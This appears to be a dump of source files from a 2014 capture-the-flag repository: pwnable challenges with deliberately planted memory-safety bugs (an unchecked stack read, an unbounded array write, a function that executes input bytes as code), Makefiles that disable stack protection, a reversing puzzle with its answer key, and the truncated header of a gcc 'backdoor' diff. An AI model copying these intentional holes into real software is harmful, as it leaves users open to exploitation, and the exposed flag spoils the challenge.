1 | /* 2 | * Byte-oriented AES-256 implementation. 3 | * All lookup tables replaced with 'on the fly' calculations. 4 | * 5 | * Copyright (c) 2007-2009 Ilya O. Levin, http://www.literatecode.com 6 | * Other contributors: Hal Finney 7 | * 8 | * Permission to use, copy, modify, and distribute this software for any 9 | * purpose with or without fee is hereby granted, provided that the above 10 | * copyright notice and this permission notice appear in all copies. 11 | * 12 | * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 13 | * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 14 | * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 15 | * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 16 | * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 17 | * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 18 | * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 19 | */ 20 | #include 21 | 22 | #ifdef __cplusplus 23 | extern "C" { 24 | #endif 25 | 26 | typedef struct { 27 | uint8_t key[32]; 28 | uint8_t enckey[32]; 29 | uint8_t deckey[32]; 30 | } aes256_context; 31 | 32 | 33 | void aes256_init(aes256_context *, uint8_t * /* key */); 34 | void aes256_done(aes256_context *); 35 | void aes256_encrypt_ecb(aes256_context *, uint8_t * /* plaintext */); 36 | void aes256_decrypt_ecb(aes256_context *, uint8_t * /* cipertext */); 37 | 38 | #ifdef __cplusplus 39 | } 40 | #endif 41 | -------------------------------------------------------------------------------- /pwnables/harry_potter/except: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/pwnables/harry_potter/except -------------------------------------------------------------------------------- /pwnables/harry_potter/except.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | 10 | #include "aes256.h" 11 | #include "SHA256.h" 12 | 13 | #define PASSWORDHASH "\x88\x10\xad\x58\x1e\x59\xf2\xbc\x39\x28\xb2\x61\x70\x7a\x71\x30" \ 14 | "\x8f\x7e\x13\x9e\xb0\x48\x20\x36\x6d\xc4\xd5\xc1\x8d\x98\x02\x25" 15 | 16 | static const unsigned char comic_enc[] = { 17 | 0x74, 0xec, 0x08, 0x32, 0x1f, 0x26, 0x09, 0xcf, 0xbf, 0x08, 0x10, 0x65, 18 | 0x79, 0x86, 0x12, 0x6b, 0xfe, 0xa7, 0x2f, 0x64, 0x93, 0xa9, 0x03, 0xc7, 19 | 0xe6, 0x1d, 0x07, 0x88, 0x52, 0x74, 0xee, 0xf0, 0x0f, 0xec, 0xc7, 0x3f, 20 | 0x56, 0x83, 0x18, 0xda, 0x31, 0x15, 0x82, 0x8e, 0x42, 0x2d, 0xaf, 0x15, 21 | 0x0f, 0xec, 0xc7, 0x3f, 0x56, 0x83, 0x18, 0xda, 0x31, 0x15, 0x82, 0x8e, 22 | 0x42, 0x2d, 0xaf, 0x15, 0xed, 0x2f, 0x56, 0xeb, 0x2f, 0x64, 0x02, 0x1a, 23 | 0x7c, 0x82, 0xde, 0xd5, 0x72, 0x95, 0xf4, 0x29, 0xe4, 0xcd, 0xe5, 0x68, 24 | 0xdd, 0x68, 0x1c, 0x9e, 0x70, 0x67, 0xac, 0x54, 0x59, 0xa9, 0x3d, 0xc1, 25 | 0x29, 0x1a, 0x14, 0xc7, 0x36, 0xec, 0xc9, 0xb6, 0x27, 0x8d, 0x00, 0xf2, 26 | 0xf3, 0xe1, 0xe4, 0x54, 0x09, 0x91, 0x1f, 0x8b, 0xff, 0x7f, 0x87, 0x30, 27 | 0x64, 0x7c, 0xb2, 0x71, 0x3d, 0x7b, 0x13, 0xe8, 0xe3, 0xf2, 0x96, 0xdd, 28 | 0x6e, 0x0c, 0x97, 0xb6, 0x14, 0xa7, 0x39, 0xf2, 0x9b, 0x17, 0x8b, 0xbe, 29 | 0xdb, 0x6c, 0xa1, 0x2f, 0xfd, 0x0e, 0x26, 0x46, 0x86, 0x39, 0x0c, 0x0d, 30 | 0x59, 0x1f, 0x41, 0xa9, 0xdf, 0x94, 0x1f, 0x9f, 0xdb, 0xfb, 0x3a, 0x98, 31 | 0x67, 0xc8, 0xa7, 0x72, 0x8f, 0xb7, 0x2d, 0x1f, 0x22, 0x3b, 0x4f, 0xf0, 32 | 0x4f, 0xd2, 0x1d, 0x0d, 0x96, 0x5e, 0xbf, 0xb9, 0x05, 0x0f, 0x27, 0x17, 33 | 0x11, 0x9f, 0x1a, 0x9d, 0x70, 0x6f, 0xcd, 0xa3, 0x22, 0x45, 0x3f, 0xf3, 34 | 0x67, 0x2f, 0xdb, 0xf3, 0x12, 0xbd, 0x05, 0xf9, 0x0a, 0x20, 0x00, 0x97, 35 | 0xbe, 0x57, 0x66, 0x73, 0xd6, 0xaf, 0xb0, 0xdd, 0xdb, 0x06, 0xeb, 0x2e, 36 | 0x7b, 0x15, 0x42, 0xba, 0xcf, 0x9e, 0x0a, 0x8f, 0x12, 0x8b, 0xf4, 0x8e, 37 | 0x17, 0xee, 0x5e, 0x5b, 0xd1, 0xf7, 0x62, 0xde, 0xb4, 0xe2, 0x84, 0x28, 38 | 0x5a, 0xbd, 0xfa, 0x3f, 0x20, 0x2b, 0xba, 0x1c, 0xb3, 0x1d, 0xdf, 0xe5, 39 | 0x52, 0x87, 0x29, 0x4e, 0x5c, 0xaf, 0x79, 0xf6, 0x9f, 0x02, 0x6d, 0xfc, 40 | 0xe8, 0xe9, 0xd5, 0xb7, 0x25, 0xf1, 0xe1, 0x5f, 0xa2, 0x33, 0x8c, 0x29, 41 | 0x1c, 0x3a, 0x22, 0x72, 0x7b, 0x49, 0xac, 0x50, 0x7f, 0x2c, 0xfb, 0x23, 42 | 0xdf, 0x7e, 0xa7, 0x95, 0x45, 0x75, 0x0e, 0x25, 0x03, 0x0b, 0xb8, 0xda, 43 | 0x56, 0x4e, 0xb9, 0x45, 0x49, 0xe9, 0xba, 0x51, 0xab, 0xa0, 0x88, 0xcc, 44 | 0xd7, 0x63, 0x4d, 0x80, 0x75, 0x0f, 0x0f, 0xee, 0x39, 0x11, 0xb4, 0xda, 45 | 0x21, 0xdb, 0xb3, 0x4b, 0xc9, 0x68, 0xdc, 0x72, 0xb4, 0x70, 0xe9, 0x88, 46 | 0x14, 0x3c, 0x56, 0x5c, 0x59, 0xc6, 0xc4, 0x8d, 0x53, 0x8a, 0x39, 0xb9, 47 | 0x3c, 0xcb, 0x21, 0xa1, 0x47, 0xd7, 0x8a, 0xfa, 0x01, 0xcd, 0x92, 0x4d, 48 | 0x0f, 0xb0, 0x32, 0xc7, 0x10, 0x8c, 0x59, 0xab, 0x2a, 0x67, 0x27, 0x04, 49 | 0x4c, 0xb1, 0x93, 0x6a, 0xb4, 0x9f, 0x78, 0x9f, 0xf8, 0x6f, 0x6a, 0xa3, 50 | 0xdf, 0x40, 0xb6, 0x56, 0xc3, 0xfb, 0x4e, 0xde, 0x0a, 0x7a, 0x0f, 0x7a, 51 | 0x59, 0x30, 0x2a, 0xf0, 0xb7, 0xbc, 0xdf, 0xed, 0x6e, 0x8d, 0x3a, 0xe6, 52 | 0x78, 0x33, 0xde, 0xe1, 0x80, 0x88, 0x37, 0x9d, 0x96, 0x99, 0xfa, 0xfb, 53 | 0xc4, 0x06, 0xaf, 0xbc, 0x7f, 0x66, 0xfc, 0x8b, 0x01, 0xe8, 0xd5, 0xcd, 54 | 0xec, 0x18, 0x89, 0x8c, 0x95, 0xc5, 0xac, 0x62, 0x31, 0xd4, 0x91, 0x5b, 55 | 0xb4, 0x57, 0x5f, 0x75, 0x90, 0xe4, 0x78, 0x4e, 0x14, 0x8e, 0x5f, 0x43, 56 | 0x0c, 0xe4, 0x4f, 0x98, 0xc5, 0x66, 0xa4, 0x43, 0x63, 0x96, 0x6b, 0xae, 57 | 0x74, 0x76, 0x58, 0xc1, 0x90, 0xda, 0x0e, 0x4a, 0x68, 0x16, 0x2e, 0xea, 58 | 0x54, 0xa4, 0x3d, 0x7e, 0xec, 0x01, 0x7c, 0x91, 0xbf, 0xad, 0x5b, 0x3f, 59 | 0x1e, 0x54, 0xfd, 0xa0, 0xb0, 0x04, 0xc0, 0x6a, 0x92, 0xf0, 0x29, 0xd7, 60 | 0xeb, 0x74, 0xf5, 0x3e, 0x5a, 0xfa, 0x9d, 0x6e, 0x76, 0x2e, 0xbe, 0x7a, 61 | 0x9e, 0x1a, 0x2d, 0xe9, 0xcf, 0x49, 0x77, 0xda, 0xda, 0x8c, 0x3a, 0xbe, 62 | 0x41, 0xaf, 0x23, 0x0e 63 | }; 64 | static const unsigned int comic_enc_len = 544; 65 | 66 | using namespace std; 67 | 68 | void readall(int fd, char * buf, int len) 69 | { 70 | int ret; 71 | int cnt = len; 72 | while (cnt > 0) 73 | { 74 | ret = read(fd, buf, cnt); 75 | if (ret > 0) 76 | { 77 | buf += ret; 78 | cnt -= ret; 79 | } 80 | else if (errno != EINTR) 81 | { 82 | throw runtime_error("Error during read"); 83 | } 84 | } 85 | } 86 | 87 | char * memstr(char * haystack, int length, const char * needle, int nlen) 88 | { 89 | char * end = haystack + length; 90 | while (haystack + nlen <= end) 91 | { 92 | if (memcmp(haystack, needle, nlen) == 0) 93 | return haystack; 94 | haystack++; 95 | } 96 | return NULL; 97 | } 98 | 99 | int exploitme() 100 | { 101 | char buf[1024]; 102 | 103 | unsigned int length; 104 | readall(STDIN_FILENO, (char *)&length, sizeof(length)); 105 | readall(STDIN_FILENO, buf, length); 106 | char * password = memstr(buf, length, "PASSWORD", 8); 107 | if (password == NULL) 108 | { 109 | cerr << "BAD FORMAT" << endl << "EXPECTED: PASSWORD=[PASSWORD]" << endl; 110 | return 0; 111 | } 112 | password += 9; 113 | int len_password = buf + length - password; 114 | 115 | // allocate memory for copy of string 116 | char * copy = new char [len_password]; 117 | memcpy(copy, password, len_password); 118 | string str(copy, len_password); 119 | 120 | uint8_t hash[32]; 121 | computeSHA256(str, hash); 122 | if (memcmp(hash, PASSWORDHASH, 32) == 0) 123 | { 124 | return 1; 125 | } 126 | else 127 | { 128 | return 0; 129 | } 130 | } 131 | 132 | static void give_reward() 133 | { 134 | aes256_context *ctx = new aes256_context; 135 | aes256_init(ctx, (uint8_t *)PASSWORDHASH); 136 | char * comic = new char [comic_enc_len]; 137 | memcpy(comic, comic_enc, comic_enc_len); 138 | for (int i = 0; i < comic_enc_len; i += 16) 139 | aes256_decrypt_ecb(ctx, (uint8_t *)comic + i); 140 | comic[comic_enc_len-1] = 0; 141 | cerr << comic << endl; 142 | aes256_done(ctx); 143 | delete ctx; 144 | delete[] comic; 145 | } 146 | 147 | int main(int argc, char * argv[]) 148 | { 149 | try 150 | { 151 | cerr << "If you guess the password, I will give you a reward!" << endl; 152 | if (exploitme()) 153 | give_reward(); 154 | else 155 | cerr << "WRONG PASSWORD!" << endl; 156 | } 157 | catch (exception& e) 158 | { 159 | cerr << "EXCEPTION: " << e.what() << endl; 160 | } 161 | return 0; 162 | } 163 | -------------------------------------------------------------------------------- /pwnables/jackshit/Makefile: -------------------------------------------------------------------------------- 1 | all: jackshit testing 2 | 3 | NS := $(shell test `uname -r | cut -d '.' -f 1,2 | tr -d '.'` -ge 313 || echo "-DNEEDS_SOCKETCALL=1") 4 | 5 | jackshit: main.c 6 | gcc -m32 -Os $^ -o $@ -lseccomp -fno-stack-protector ${NS} 7 | strip $@ 8 | 9 | testing: main.c 10 | gcc -m32 -Os $^ -o $@ -lseccomp -fno-stack-protector -DLOCAL_TESTING=1 ${NS} 11 | strip $@ 12 | 13 | clean: 14 | rm -f jackshit testing 15 | -------------------------------------------------------------------------------- /pwnables/kappa/Makefile: -------------------------------------------------------------------------------- 1 | all: kappa 2 | 3 | kappa: kappa.c 4 | gcc -m32 -std=c99 -w $^ -o $@ 5 | strip $@ 6 | 7 | .PHONY: clean 8 | clean: 9 | rm kappa 10 | 11 | -------------------------------------------------------------------------------- /pwnables/kappa/art.h: -------------------------------------------------------------------------------- 1 | static char charizard_art[2150] =".\"-,.__\n `. `. ,\n .--' .._,'\"-' `.\n . .' `'\n `. / ,'\n ` '--. ,-\"'\n `\"` | \\\n -. \\, |\n `--Y.' ___.\n \\ L._, \\\n _., `. < <\\ _\n ,' ' `, `. | \\ ( `\n ../, `. ` | .\\`. \\ \\_\n ,' ,.. . _.,' ||\\l ) '\".\n , ,' \\ ,'.-.`-._,' | . _._`.\n ,' / \\ \\ `' ' `--/ | \\ / / ..\\\n .' / \\ . |\\__ - _ ,'` ` / / `.`.\n | ' .. `-...-\" | `-' / / . `.\n | / |L__ | | / / `. `.\n , / . . | | / / ` `\n / / ,. ,`._ `-_ | | _ ,-' / ` \\\n / . \\\"`_/. `-_ \\_,. ,' +-' `-' _, ..,-. \\`.\n. ' .-f ,' ` '. \\__.---' _ .' ' \\ \\\n' / `.' l .' / \\.. ,_|/ `. ,'` L`\n|' _.-\"\"` `. \\ _,' ` \\ `.___`.'\"`-. , | | | \\\n|| ,' `. `. ' _,...._ ` | `/ ' | ' .|\n|| ,' `. ;.,.---' ,' `. `.. `-' .-' /_ .' ;_ ||\n|| ' V / / ` | ` ,' ,' '. ! `. ||\n||/ _,-------7 ' . | `-' l / `||\n. | ,' .- ,' || | .-. `. .' ||\n `' ,' `\".' | | `. '. -.' `'\n / ,' | |,' \\-.._,.'/'\n . / . . \\ .''\n .`. | `. / :_,'.'\n \\ `...\\ _ ,'-. .' /_.-'\n `-.__ `, `' . _.>----''. _ __ /\n .' /\"' | \"' '_\n /_|.-'\\ ,\". '.'`__'-( \\\n / ,\"'\"\\,' `/ `-.|\" mh:\n"; 2 | 3 | //static char metapod_art[1900] = " ,--..\n / `.\n /| `.\n / | |\n / j |\n / | `\n ' ,' \\\n ,' L\n / +\n .:. . `\n ,\"`. `. ,..-._ +\n | |`. L ' _.'`. .\n j `.,\\ ' | ,.' | +. +\n '`. |,' |\" `\"\" / `, .\n | `\"\"'/ `-.____.' \\|\n ,'| ,' Y\n / | / '|\n / | ,' ,' +\n / \\-' / `\n / / ,' `\n . ,`'-. ,' L\n \\ / \\ / .\n / ` \\ |\n `/ _, ` ,'\n | ` ,'\n | \"' `. ,'\n j -\"' |`-'\n / /'/\n / , / /\n / ' j /\n .' ___ '/\n |-' `\"`-. '/\n ' \\ .'\n ,\" l _,.-'\n ,---.. |L _.-'\n ,' `. / | ,-'\n / ` _,' ;-'\n ,'--. ,-`| ,-'\n / L _,' _|-'\n( \\-' _,-'\n `......^.-' mh\n\n"; 4 | 5 | static char pidgeot_art[1500] = " ..-`\"-._\n ,' ,'`.\n ,f \\ . / ,-'-.\n ' `. | | , ,'`|\n `.-. \\| | ,.' ,-.\\\n /| |. ` | /.'\"||Y .\n . |_|U_\\.|//_U_||. |\n | j / . \\ |'\n L / \\ .j`\n . `\"`._,--| // \\\n j `. ,' , \\ L\n ____/ `\"' \\ L |\n ,-' ,' \\|'-+.\n / ,' . \\\n / / ` `.\n . | j \\ \\\n |F | ' \\ .\n || F | |\\|\n || | | | |\n || | | | |\n `.._L | ,' '\n . | |,| ,'\n ` | '||| j/\n `.' . ,' / '\n \\\\ `._ ,' / ,'\n .\\ ._ ,' /,'\n . , .'| \\ ( //\n j_|'_,' | ._'` / `.\n ' | | | | Y `.\n ,.__ `; | |-\"\"\"^\"\"\"' |.--\"\"`\n ,--\\ \"\"\" , \\ / \\ ,- \"\"\"\"---.\n'.--`v.=:.-' . L.\"`\"'\"\\ , `.,.._ /`.\n .L j-\"`. `\\ j |`. \"'--\"\"`-'\n / |_,' L ,-.| (/`.) `-\\.-'\\\n `-\"\" `. | l / `-\"`-'\n ` `- mh\n"; 6 | 7 | static char kakuna_art[500] = " _.---._\n .' '.\n / \\\n / /'-. .-'\\ \\\n '.`\"\"\"` `\"\"\"`.'\n /'-._ _.-'\\\n /_.--\\`-`/--._\\\n ; |'-'| ;\n | .'/ | \\'. |\n | | \\ | / | |\n \\ \\/\\|/\\/ /\n \\_/ _ \\_/\n |-'` `'-|\n |.-\"\"\"-.|\n \\ .---. /\n '._ _.'\n `\n"; 8 | -------------------------------------------------------------------------------- /pwnables/sass/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all run clean 2 | all: sass 3 | clean: 4 | rm sass 5 | sass: sass.c 6 | cc -std=c99 -m32 -pie -fPIE -fno-stack-protector -O2 -o $@ $^ 7 | run: sass 8 | ./sass 9 | -------------------------------------------------------------------------------- /pwnables/sass/sass.c: -------------------------------------------------------------------------------- 1 | #define _BSD_SOURCE 1 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | int compar(const void *a, const void *b) { 10 | intptr_t x = *(intptr_t*)a; 11 | intptr_t y = *(intptr_t*)b; 12 | if(x > y) return 1; 13 | if(x < y) return -1; 14 | return 0; 15 | } 16 | 17 | size_t read_numbers(intptr_t *numbers) { 18 | char buffer[4096]; 19 | size_t count = 0; 20 | 21 | bool prevNewline = false; 22 | bool hexDigits = false; 23 | bool shouldNegate = false; 24 | uintptr_t accu = 0; 25 | while(1) { 26 | ssize_t bytesread = read(0, buffer, sizeof buffer); 27 | assert(bytesread > 0); 28 | for(ssize_t i = 0; i < bytesread; i++) { 29 | switch(buffer[i]) { 30 | case '-': 31 | shouldNegate = true; 32 | break; 33 | case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': 34 | accu *= hexDigits ? 16 : 10; 35 | accu += buffer[i] - '0'; 36 | break; 37 | case 'A': case 'B': case 'C': case 'D': case 'E': case 'F': 38 | accu *= 16; 39 | accu += buffer[i] - 'A' + 10; 40 | break; 41 | case 'a': case 'b': case 'c': case 'd': case 'e': case 'f': 42 | accu *= 16; 43 | accu += buffer[i] - 'a' + 10; 44 | break; 45 | case 'x': 46 | hexDigits = true; 47 | break; 48 | case '\n': 49 | if(prevNewline) return count; 50 | else prevNewline = true; 51 | // Fall through 52 | case ' ': 53 | case '\t': 54 | hexDigits = false; 55 | numbers[count] += shouldNegate ? -accu : accu; 56 | accu = 0; 57 | count++; 58 | break; 59 | default: 60 | assert(!"Bad input."); 61 | } 62 | if(buffer[i] != '\n') prevNewline = false; 63 | } 64 | } 65 | } 66 | 67 | 68 | int main(int argc, char *argv[]) { 69 | alarm(60); 70 | setlinebuf(stdout); 71 | 72 | intptr_t numbers[32] = {0}; 73 | puts("Sorting as a service!"); 74 | puts("Enter your numbers:"); 75 | size_t n = read_numbers(numbers); 76 | puts("Sorting..."); 77 | qsort(numbers, n, sizeof(*numbers), compar); 78 | puts("OK, here you are:"); 79 | for(size_t i = 0; i < n; i++) 80 | printf("0x%0*lx\n", 2*(int)sizeof(*numbers), numbers[i]); 81 | puts("Thank you, come again!"); 82 | return 0; 83 | } 84 | -------------------------------------------------------------------------------- /pwnables/tenement/Makefile: -------------------------------------------------------------------------------- 1 | all: tenement 2 | 3 | tenement: tenement.c 4 | gcc -z execstack -m32 -Wall -lseccomp -ljansson -Os $^ -o $@ 5 | strip $@ 6 | 7 | exploit: tenement 8 | python ./exploit.py | ./tenement config.json 9 | 10 | netsploit: 11 | python ./exploit.py | nc localhost 9999 12 | 13 | seccomp_test: 14 | python ./seccomp_test.py | ./tenement config.json 15 | 16 | clean: 17 | rm tenement 18 | 19 | install: tenement 20 | sudo ./setup.sh 21 | -------------------------------------------------------------------------------- /pwnables/tenement/tenement.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define BUF_SIZE 128 9 | 10 | const char *msg = "Welcome to another quality problem. PPP is a big fan of being fair and reasonable.\n" 11 | "We've therefore constructed this problem to exemplify those two qualities. The flag to\n" 12 | "this problem has been fairly placed, but we have implemented reasonable protections\n" 13 | "to overcome and hoops for you to jump through in order to retrieve said flag. If you\n" 14 | "find this acceptable, please type \"YES\" and we can continue.\n"; 15 | 16 | int init_seccomp() { 17 | int rc; 18 | 19 | scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); 20 | if (ctx == NULL) 21 | goto out; 22 | 23 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); 24 | if (rc < 0) 25 | goto out; 26 | 27 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); 28 | if (rc < 0) 29 | goto out; 30 | 31 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0); 32 | if (rc < 0) 33 | goto out; 34 | 35 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(access), 0); 36 | if (rc < 0) 37 | goto out; 38 | 39 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(dup3), 0); 40 | if (rc < 0) 41 | goto out; 42 | 43 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(fstat), 0); 44 | if (rc < 0) 45 | goto out; 46 | 47 | rc = seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); 48 | if (rc < 0) 49 | goto out; 50 | 51 | rc = seccomp_load(ctx); 52 | if (rc < 0) 53 | goto out; 54 | 55 | return 0; 56 | out: 57 | seccomp_release(ctx); 58 | return -1; 59 | } 60 | 61 | int load_key(const char *f) { 62 | struct { 63 | size_t s, key_len, i; 64 | const char *key; 65 | json_t *json, *tmp, *addrs; 66 | json_error_t error; 67 | void *addr, *mapped_addr, *stmp; 68 | } st; 69 | 70 | st.json = json_load_file(f, 0, &st.error); 71 | if (st.json == NULL) 72 | return -1; 73 | f = NULL; 74 | 75 | st.tmp = json_object_get(st.json, "key"); 76 | if (st.tmp == NULL) 77 | return -1; 78 | 79 | st.key = json_string_value(st.tmp); 80 | if (st.key == NULL) 81 | return -1; 82 | st.key_len = strlen("pppp: "); 83 | st.key_len += strlen(st.key); 84 | st.key_len += 1; 85 | 86 | st.stmp = malloc(st.key_len); 87 | if (st.stmp == NULL) 88 | return -1; 89 | 90 | if (snprintf(st.stmp, st.key_len, "%s%s", "pppp: ", st.key) < 0) 91 | return -1; 92 | json_decref(st.tmp); 93 | 94 | for (st.i = 0; st.i < 4; st.i++) 95 | ((char *) st.stmp)[st.i] -= 32; 96 | 97 | st.addrs = json_object_get(st.json, "addrs"); 98 | if (st.addrs == NULL) 99 | return -1; 100 | 101 | st.s = json_array_size(st.addrs); 102 | if (st.s == 0) 103 | return -1; 104 | 105 | while (1) { 106 | st.tmp = json_array_get(st.addrs, rand() % st.s); 107 | if (st.tmp == NULL) 108 | return -1; 109 | 110 | st.addr = (void *) (uintptr_t) json_integer_value(st.tmp); 111 | if (st.addr == NULL) 112 | return -1; 113 | 114 | st.mapped_addr = mmap(st.addr, st.key_len, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); 115 | if (st.mapped_addr == MAP_FAILED) 116 | continue; 117 | 118 | if ((st.mapped_addr - st.addr) > 0x4000 || ((st.addr - st.mapped_addr) > 0x4000)) { 119 | munmap(st.mapped_addr, st.key_len); 120 | continue; 121 | } 122 | 123 | for (st.i = 0; st.i < st.key_len; st.i++) 124 | ((char *) st.mapped_addr)[st.i] = ((char *) st.stmp)[st.i]; 125 | 126 | if (mprotect(st.mapped_addr, st.key_len, PROT_READ) != 0) { 127 | munmap(st.mapped_addr, st.key_len); 128 | continue; 129 | } 130 | 131 | break; 132 | } 133 | 134 | json_decref(st.addrs); 135 | json_decref(st.tmp); 136 | json_decref(st.json); 137 | memset(st.stmp, 42, st.key_len); 138 | free(st.stmp); 139 | memset(&st, 42, sizeof(st)); 140 | return 0; 141 | } 142 | 143 | void run_vuln(void) { 144 | char buf[BUF_SIZE]; 145 | write(STDOUT_FILENO, msg, strlen(msg)); 146 | read(STDIN_FILENO, buf, BUF_SIZE); 147 | (* (void(*)()) buf)(); 148 | } 149 | 150 | 151 | int main(int argc, char **argv) { 152 | srand(time(NULL)); 153 | 154 | if (argc != 2) { 155 | fprintf(stderr, "Usage: ./tenement CONFIG\n"); 156 | return -1; 157 | } 158 | 159 | if (load_key(argv[1]) < 0) 160 | return -1; 161 | 162 | if (init_seccomp() < 0) 163 | return -1; 164 | 165 | run_vuln(); 166 | return 0; 167 | } 168 | -------------------------------------------------------------------------------- /reversing/g++/.gitignore: -------------------------------------------------------------------------------- 1 | solveme 2 | key.h 3 | -------------------------------------------------------------------------------- /reversing/g++/Makefile: -------------------------------------------------------------------------------- 1 | KEY:=guess_a_key 2 | .PHONY: all key.h 3 | 4 | all: solveme.cpp key.h 5 | g++ -std=c++0x solveme.cpp -ftemplate-depth-1000000 -o solveme 6 | 7 | key.h: 8 | echo '${KEY}' | perl -p -e 's/(.)/sprintf("K(%d,%d)\n",$$i++,ord($$1))/ge' > key.h 9 | -------------------------------------------------------------------------------- /reversing/g++/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/reversing/g++/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz -------------------------------------------------------------------------------- /reversing/g++/key: -------------------------------------------------------------------------------- 1 | C++_m0re_lyk_C-- 2 | -------------------------------------------------------------------------------- /reversing/g++/solveme.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #define R(a) (m<(a),(QQ),(QQ)>::r) 4 | #define RR(a,b) (n::q) 5 | #define RRR(a,b,c,d) RR(RR(a,c),RR(b,d)) 6 | #define RRRR(s,t,u,v,w,x,y,z) R(RRR(Q(s,w),Q(t,x),Q(u,y),Q(v,z))) 7 | #define RRRP(s,t,u,v,w) RRRR(s,t,u,v,R(TT(P,w)),R(TT(P,J(w))), \ 8 | R(TT(P,J(J(w)))),R(TT(P,J(J(J(w)))))) 9 | #define Q(a,b) (n::s) 10 | #define S static const int 11 | #define NNN(q) NN(a,R(b),c,R(d),q) 12 | #define NN(a,c,b,d,q) q = n<(a-1),(c-1),(b+1),(((a+b)>>1)+d)>::q ; 13 | #define QQ ((1<<(1<<3))|1) 14 | #define PT(k,a) key::r 15 | #define WW(a) PT(k,a) 16 | #define WWJD(a) WW(a),WW(III(a)),WW(IV(a)),WW(IV(III(a))) 17 | #define WWKD(a) g::r,g::r,g::r,g::r 18 | #define P(a,b) WWKD(((a)<<2)),WWJD(b) 19 | #define P0 1 20 | #define P1 (P0*f) 21 | #define P2 (P1*P1) 22 | #define P3 (P1*P2) 23 | #define P4 (P2*P2) 24 | #define P5 (P1*P4) 25 | #define P6 (P3*P3) 26 | #define P7 (P3*P4) 27 | #define S0(a,b) ((a)?(a):(b)) 28 | 29 | #define T(a, ...) a ## __VA_ARGS__ 30 | #define TT(a, ...) T(a, __VA_ARGS__) 31 | #define J(x) T(I,x) 32 | #define I(x) x+T(I,0) 33 | #define II(x) I(I(x)) 34 | #define III(x) II(II(x)) 35 | #define IV(x) III(III(x)) 36 | #define I0 1 37 | #define I1 2 38 | #define I2 3 39 | #define I3 4 40 | #define I4 5 41 | #define I5 6 42 | #define I6 7 43 | #define I7 8 44 | #define I8 9 45 | #define I9 0 46 | 47 | template 48 | struct key { 49 | S r = 0; 50 | }; 51 | 52 | #define K(i,v) \ 53 | template <> \ 54 | struct key { \ 55 | S r = v; \ 56 | }; 57 | 58 | #include "key.h" 59 | 60 | template 61 | struct m { 62 | S r = (a-((a/b)*b)); 63 | }; 64 | 65 | template 66 | struct n { 67 | S NNN(q) 68 | S NNN(r) 69 | S NNN(s); 70 | }; 71 | 72 | template 73 | struct n { 74 | S r = a; 75 | S q = c; 76 | S s = d; 77 | }; 78 | 79 | template 80 | struct d { 81 | S r = RRRR(s,t,u,v,w,x,y,z); 82 | }; 83 | 84 | template 85 | struct g { 86 | S r = ((3 + g::r*7) ^ (g::r*2))&255; 87 | }; 88 | 89 | template <> 90 | struct g<0> { 91 | S r = 13; 92 | }; 93 | 94 | template 95 | struct u { 96 | S r = u>3)>::r; 97 | }; 98 | 99 | template 100 | struct u { 101 | S r = RRRP(26,43,192,42,0)+RRRP(246,8,221,155,4); 102 | }; 103 | 104 | template 105 | struct u { 106 | S r = RRRP(132,141,229,162,4)+RRRP(48,222,109,0,0); 107 | }; 108 | 109 | 110 | template 111 | struct r { 112 | S rr = d::r; 113 | }; 114 | 115 | 116 | template 117 | struct gg { 118 | S r = R((u::r)) - r<(n>>2),((n)&3)>::rr; 119 | }; 120 | 121 | template 122 | struct vvv { 123 | S r = gg::r|gg::r|gg::r|gg::r; 124 | }; 125 | 126 | template 127 | struct vv { 128 | S r = vvv<0>::r|vvv<4>::r|vvv<8>::r|vvv<12>::r; 129 | }; 130 | 131 | int main() { 132 | if (!vv<0>::r) { 133 | int i; 134 | char skey[] = {key<0>::r, key<1>::r, key<2>::r, key<3>::r, key<4>::r, key<5>::r, key<6>::r, key<7>::r, key<8>::r, key<9>::r, key<10>::r, key<11>::r, key<12>::r, key<13>::r, key<14>::r, key<15>::r}; 135 | for (i = 0; i < 1<<(1<<(1<<1)); i++) 136 | std::cout << skey[i]; 137 | std::cout << "\n"; 138 | } 139 | else { 140 | std::cout << "Wrong\n"; 141 | } 142 | return 0; 143 | } 144 | -------------------------------------------------------------------------------- /reversing/gcc/gimplify.c.diff: -------------------------------------------------------------------------------- 1 | --- gcc-4.8.2/gcc/gimplify.c 2013-01-28 09:05:40.000000000 -0500 2 | +++ gcc-4.8.2/gcc/gimplify.c.backdoor 2014-03-16 02:28:40.000000000 -0400 3 | 